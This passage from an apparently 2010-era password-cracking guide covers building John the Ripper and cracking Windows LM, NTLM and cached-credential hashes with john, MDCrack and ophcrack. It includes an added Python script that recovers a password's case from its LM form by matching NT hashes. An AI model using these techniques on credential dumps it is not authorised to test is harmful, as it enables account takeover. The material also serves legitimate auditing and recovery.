- BFEgg_fmt.o BF_fmt.o BF_std.o AFS_fmt.o LM_fmt.o NT_fmt.o XSHA_fmt.o DOMINOSEC_fmt.o
- lotus5_fmt.o oracle_fmt.o MYSQL_fmt.o mysqlSHA1_fmt.o KRB5_fmt.o KRB5_std.o md5_go.o
- rawMD5go_fmt.o md5_eq.o PO_fmt.o md5.o hmacmd5.o hmacMD5_fmt.o IPB2_fmt.o
- rawSHA1_fmt.o NSLDAP_fmt.o NSLDAPS_fmt.o OPENLDAPS_fmt.o base64.o md4.o smbencrypt.o
- mscash_fmt.o NETLM_fmt.o NETNTLM_fmt.o NETLMv2_fmt.o NETHALFLM_fmt.o mssql_fmt.o
- mssql05_fmt.o EPI_fmt.o PHPS_fmt.o MYSQL_fast_fmt.o pixMD5_fmt.o sapG_fmt.o sapB_fmt.o
- NS_fmt.o HDAA_fmt.o batch.o bench.o charset.o common.o compiler.o config.o cracker.o crc32.o
- external.o formats.o getopt.o idle.o inc.o john.o list.o loader.o logger.o math.o memory.o misc.o
- options.o params.o path.o recovery.o rpp.o rules.o signals.o single.o status.o tty.o wordlist.o mkv.o
- mkvlib.o unshadow.o unafs.o undrop.o unique.o x86.o x86-mmx.o sha1-mmx.o md5-mmx.o -s -L/usr
- /local/lib -L/usr/local/ssl/lib -lcrypto -lm -o ../run/john
- rm -f ../run/unshadow
- ln -s john ../run/unshadow
- rm -f ../run/unafs
- ln -s john ../run/unafs
- rm -f ../run/unique
- ln -s john ../run/unique
- rm -f ../run/undrop
- ln -s john ../run/undrop
- gcc -c -Wall -O2 -fomit-frame-pointer -I/usr/local/include -L/usr/local/lib -funroll-loops genmkvpwd.c
- gcc -c -Wall -O2 -fomit-frame-pointer -I/usr/local/include -L/usr/local/lib -funroll-loops
- -D_JOHN_MISC_NO_LOG misc.c -o miscnl.o
- gcc genmkvpwd.o mkvlib.o memory.o miscnl.o -s -lm -o ../run/genmkvpwd
- gcc -c -Wall -O2 -fomit-frame-pointer -I/usr/local/include -L/usr/local/lib -funroll-loops
- mkvcalcproba.c
- gcc mkvcalcproba.o -s -lm -o ../run/mkvcalcproba
- gcc -c -Wall -O2 -fomit-frame-pointer -I/usr/local/include -L/usr/local/lib -funroll-loops calc_stat.c
- gcc calc_stat.o -s -lm -o ../run/calc_stat
- make[1]: Leaving directory `/root/john-1.7.4.2/src'
- 11. # cd ..
- 12. # mv run /pentest/passwords/john
- You now have the latest version of John the Ripper and it supports more algorithms than the vanilla John the
- Ripper thanks to the jumbo patch.
- 3.3.1.2.2 Cracking the LM hash
- john only needs to know the path to the hash.txt to begin bruteforcing and return the uppercase password
- # /usr/local/john/john hash.txt
- 3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce)
- I haven't figured out how to use this feature. John the Ripper is a very powerful tool, however it is not very
- intuitive to use. I can point you to the John the Ripper wiki which has mailing list excerpts covering how to use
- dumbforce and knownforce. The URL is http://openwall.info/wiki/john/mailing-list-excerpts
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 12 of 45 2/15/2010 3:48 PM
- 3.3.1.2.4 Cracking the NTLM hash
- john only needs the path to hash.txt and the format name. Unlike LM, the NT hash is case-sensitive, so the password comes back with its real case.
- # /usr/local/john/john --format:NT hash.txt
- will begin cracking the NT hashes (single, wordlist, then incremental brute-force mode)
- 3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce)
- I haven't figured out how to use this feature. John the Ripper is a very powerful tool; however, it is not very
- intuitive to use. I can point you to the John the Ripper wiki, which has mailing-list excerpts covering how to use
- dumbforce and knownforce. The url is http://openwall.info/wiki/john/mailing-list-excerpts
- 3.3.1.2.6 Cracking cached credentials
- john only needs the path to hash.txt; mscash is the format for Windows cached domain logon credentials (MS Cache), which are stored separately from the SAM.
- # /usr/local/john/john --format:mscash hash.txt
- 3.3.1.3 Using MDCrack
- For whatever reason I have been unsuccessful in getting mdcrack-183 to work with any version of wine. This
- is strange as I know I had it working previously. To use mdcrack with BackTrack, upgrade wine to
- the latest development version and then use MDCrack-182.zip.
- For BackTrack 3 users:
- 1. Go to http://www.winehq.org/site/download and click on slackware.
- 2. Download the latest tgz file, which as of this writing is 1.1.29.
- 3. Open an xterm window.
- 4. # upgradepkg wine-1.1.29-i486-1kjz.tgz
- 5. Download MDCrack-182.zip:
- # wget http://membres.lycos.fr/mdcrack/download/MDCrack-182.zip
- or
- # wget http://c3rb3r.openwall.net/mdcrack/download/MDCrack-182.zip
- 6. # mkdir mdcrack
- 7. # mv MDCrack-182.zip mdcrack
- 8. # cd mdcrack
- 9. # unzip MDCrack-182.zip
- For BackTrack 4 users:
- 1. Open an xterm window.
- 2. # wget -q http://wine.budgetdedicated.com/apt/387EE263.gpg -O- | sudo apt-key add -
- 3. # sudo wget http://wine.budgetdedicated.com/apt/sources.list.d/jaunty.list -O /etc/apt/sources.list.d/winehq.list
- 4. # sudo apt-get update
- 5. # sudo apt-get install wine
- 6. Download MDCrack-182.zip:
- # wget http://membres.lycos.fr/mdcrack/download/MDCrack-182.zip
- or
- # wget http://c3rb3r.openwall.net/mdcrack/download/MDCrack-182.zip
- 7. # mkdir mdcrack
- 8. # mv MDCrack-182.zip mdcrack
- 9. # cd mdcrack
- 10. # unzip MDCrack-182.zip
- 3.3.1.3.1 Cracking the LM hash
- MDCrack doesn't crack LM hashes.
- 3.3.1.3.2 Cracking the NTLM hash
- # wine MDCrack-sse.exe --algorithm=NTLM1 NTLMHASH
- NTLMHASH would be D280553F0103F2E643406517296E7582, for example.
- The result should be TestTest.
- A pure brute force like this grows exponentially with the password length, so the way to speed it up is to narrow the search: if you know the minimum length of the password, specify it with --minsize= (the next section narrows the character set instead).
- 3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash
- Stasik told me it is much easier to crack the NTLM hash if you know the character set. This way you do not
- need to bruteforce all possible character combinations. Once you have TESTTEST, feed a custom character
- set of tesTES to mdcrack and it will return the proper-case password much faster than if you did not limit the
- character set.
- # wine MDCrack-sse.exe --charset=tesTES --algorithm=NTLM1 D280553F0103F2E643406517296E7582
- If you know the password length you can use:
- # wine MDCrack-sse.exe --charset=tesTES --algorithm=NTLM1 --minsize=8 --maxsize=8
- D280553F0103F2E643406517296E7582
- The password is TestTest however mdcrack 1.8.3 returns sestTest. I filed a bug report with Gregory
- Duchemin, the author of mdcrack, and he has fixed the problem with version 1.8.4.
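- The LM-to-NTLM step above (and the john dumbforce step in 3.3.1.2.5) can be done without either tool, because once the LM hash has given you the uppercase letters, the only unknown in the NT hash is the case of each letter. The script below is an added example, not code from the original document or from john or mdcrack: it computes the NT hash (MD4 over the UTF-16LE password) with a pure-Python MD4 so it does not depend on OpenSSL still shipping the legacy MD4 digest, and then tries every upper/lower assignment of the letters (at most 2^14 candidates for a 14-character LM password) instead of a charset brute force. The demo target hash is computed in the block from a known password rather than copied from a pwdump file; in practice you would paste the NT hash from hash.txt.

```python
"""Recover the case-sensitive NT password from an uppercase LM password."""
import itertools
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest (pure Python, for portability)."""
    msg = bytearray(data)
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)                       # padding: 1 bit, zeros, 64-bit length
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)

    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    # (boolean function, round constant, message-word order, shift amounts)
    rounds = [
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    ]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[k] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c      # rotate the working variables
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16le"))


def recover_case(lm_password: str, nt_hash_hex: str):
    """Find the casing of lm_password whose NT hash equals nt_hash_hex.

    Only alphabetic positions are toggled, so the cost is 2**(number of
    letters) MD4 computations. Returns None when no casing matches, e.g.
    when the NT password is longer than 14 characters (LM only covers a
    truncated form) or the two hashes belong to different passwords.
    """
    target = bytes.fromhex(nt_hash_hex)
    letters = [i for i, ch in enumerate(lm_password) if ch.isalpha()]
    chars = list(lm_password.upper())
    for lower_flags in itertools.product((False, True), repeat=len(letters)):
        for idx, flag in zip(letters, lower_flags):
            chars[idx] = lm_password[idx].lower() if flag else lm_password[idx].upper()
        candidate = "".join(chars)
        if nt_hash(candidate) == target:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed demo: the target NT hash is derived from "TestTest" here
    # instead of being read from hash.txt, so the run is self-checking.
    demo_nt = nt_hash("TestTest").hex().upper()
    print(recover_case("TESTTEST", demo_nt))
```

- If the LM hash came back as two halves (an 8 to 14 character password), join the halves in order before calling recover_case; the second LM half being the empty-password value means the password is at most 7 characters. A None result with a matching-looking hash pair usually means the NT password is longer than 14 characters and LM never saw the tail of it.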
- 3.3.1.4 Using Ophcrack
- 3.3.1.4.1 Cracking the LM hash
- Download ophcrack and the rainbow tables from http://sourceforge.net/project/showfiles.php?group_id=133599. If you have the disk space I recommend downloading XP free fast, formerly known as SSTIC04-5K. If this is a demo or you do not have a lot of disk space, download XP free small, formerly known as SSTIC04-10K. This is not a typo; SSTIC04-5K is a larger download than SSTIC04-10K (the larger table is the faster one to crack with). You can also purchase the XP Special table, which contains longer passwords and special characters. There are separate tables for Vista: Vista free, the small one, is free; Vista Special, which can be purchased, contains hashes for passwords up to 8 characters. See http://ophcrack.sourceforge.net/tables.php for the details. The rainbow tables that ophcrack uses are NOT compatible with the rainbow tables generated by rtgen (RainbowCrack).
- 1. # tar -xvzf ophcrack-2.4.1.tar.gz
- 2. # cd ophcrack-2.4.1
- 3. # ./configure
- 4. # make
- 5. # make install
- 6. # ophcrack
- 7. Click the Load button and select the appropriate option; I will select local SAM.
- 8. Click the Tables button and select the rainbow table you installed.
- 9. Click the Launch button. You will see pre-loading table boxes on the screen. You may also see a
- message that says "All LM hashes are empty. Please use NThash tables to crack the remaining hashes."
- This means no LM hash was stored for those accounts: either the administrators disabled Windows' ability to store LM hashes (the NoLMHash policy) or the passwords are longer than 14 characters, which LM cannot hash. Only the NT hash can be cracked for such accounts.
- 10. Wait until ophcrack is done.
- 3.3.1.4.2 Cracking the NTLM hash
- You will have to purchase the NTLM rainbow tables from http://www.objectif-securite.ch/en/products.php.
- The rainbow table covers 99% of passwords made of the following characters:
- length 1 to 6:
- 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ (space included)
- length 7:
- 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
- length 8:
- 0123456789abcdefghijklmnopqrstuvwxyz
- You CANNOT generate your own rainbow tables for ophcrack to use. If you know that the password meets the above specs, purchase the table and give it a try; a password outside this character set or longer than 8 characters will not be found by it.
- 3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash
- ophcrack cannot do this. If ophcrack cracks the LM hash, switch to john or mdcrack to recover the
- NTLM password with its correct case.
- 3.3.2 Using Windows Tools
- 3.3.2.1 John the Ripper
- 3.3.2.1.1 Cracking the LM hash
- 1. Download John the Ripper from http://www.openwall.com/john/
- 2. Open a command prompt (Start, Run, cmd, Enter).
- 3. cd to where you extracted john (I extracted john to the root of my C drive), so it would be cd \john171w\run
- C:\> cd \john171w\run
- 4. john only needs to know the path to hash.txt to begin cracking and return the uppercase password (LM uppercases the password before hashing it)
- C:\> john-386 C:\hash.txt
- 3.3.2.1.2 Cracking the NTLM hash